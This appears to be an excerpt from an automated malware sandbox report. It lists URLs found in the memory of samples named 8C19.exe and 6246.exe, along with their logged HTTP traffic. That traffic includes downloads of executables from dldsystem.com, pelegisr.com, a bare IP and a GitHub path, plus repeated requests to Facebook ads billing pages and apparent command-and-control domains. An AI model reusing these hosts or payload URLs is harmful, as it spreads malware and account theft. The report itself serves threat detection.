                Source: 8C19.exe, 0000000A.00000003.566738501.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3ag
                Source: 8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3awal
                Source: 6246.exe, 00000008.00000003.533650856.000000000087C000.00000004.00000020.00020000.00000000.sdmp, 6246.exe, 00000008.00000003.534943430.000000000087C000.00000004.00000020.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.538648830.000000000087C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: explorer.exe, 0000000F.00000002.498010000.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.494090495.0000000000910000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://furubujjul.net/
                Source: explorer.exe, 0000000F.00000002.498010000.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.494090495.0000000000910000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://furubujjul.net/Mozilla/5.0
                Source: 6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
                Source: explorer.exe, 00000001.00000000.367799571.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.319113552.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.403304956.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                Source: 956C.tmp.14.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
                Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/fo
                Source: 6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
                Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json1
                Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonE=
                Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonI
                Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsondll.
                Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsong
                Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json~
                Source: 956C.tmp.14.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: 956C.tmp.14.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: 956C.tmp.14.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: 956C.tmp.14.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://messenger.com/
                Source: 956C.tmp.14.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                Source: 956C.tmp.14.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                Source: 956C.tmp.14.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                Source: 956C.tmp.14.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                Source: 8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/
                Source: 8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/TT
                Source: 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/ninstagram.
                Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/_LkNZPqGRAz.js?_nc_x=Ij3Wp8lg5Kz
                Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/jQFlt4gyp9R.js?_nc_x=Ij3Wp8lg5Kz
                Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537958292.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/0
                Source: 8C19.exe, 0000000A.00000003.533912561.00000000023CF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534957053.00000000023D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xXDOO3oMCfl.js?_nc_x=Ij3Wp8lg5Kz
                Source: 8C19.exe, 0000000A.00000003.533912561.00000000023CF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534957053.00000000023D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/pslzeMSEB_a.js?_nc_x=Ij3Wp8lg5Kz
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0
                Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/V_wJ8EQu-vo.js?_nc_x=Ij3Wp8lg5Kz
                Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/nHDYRDL5JAA.js?_nc_x=Ij3Wp8lg5Kz
                Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yX/r/lwJdNrJ0mJk.js?_nc_x=Ij3Wp8lg5Kz
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yb/l/0
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0
                Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/_S6bZc2Nrqz.js?_nc_x=Ij3Wp8lg5Kz
                Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0
                Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yk/l/0
                Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yn/l/0
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/ys/l/0
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yv/l/0
                Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yK/l/en_US/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz
                Source: 956C.tmp.14.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: unknownDNS traffic detected: queries for: furubujjul.net
                Source: global trafficHTTP traffic detected: GET /upload/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: pelegisr.com
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /testermanmag/myownre/raw/main/explorer.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
                Source: global trafficHTTP traffic detected: GET /jamesp.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: dldsystem.com
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: dldsystem.com
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
                Source: global trafficHTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.174.137.174
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
                Source: global trafficHTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: aaa.apiaaaeg.com
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
